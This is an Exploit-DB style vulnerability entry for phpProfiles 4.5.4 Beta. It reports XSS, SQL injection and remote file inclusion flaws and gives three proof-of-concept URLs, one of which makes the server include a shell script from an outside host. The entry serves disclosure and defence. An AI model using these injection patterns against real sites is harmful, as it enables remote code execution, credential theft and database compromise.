phpProfiles - Multiple Vulnerabilities

EDB-ID:

37537

CVE:

N/A




Platform:

PHP

Date:

2012-07-24


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/54660/info

phpProfiles is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to execute malicious code within the context of the web server process, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

phpProfiles 4.5.4 Beta is vulnerable; other versions may also be affected. 

http://www.example.com/full_release/community.php?action=showtopic&comm_id=00001&topic_id=0000000009&topic_title=[XSS]
http://www.example.com/full_release/community.php?comm_id=[SQL]
http://www.example.com/Full_Release/include/body_admin.inc.php?menu=http://www.example1.com/shell.txt?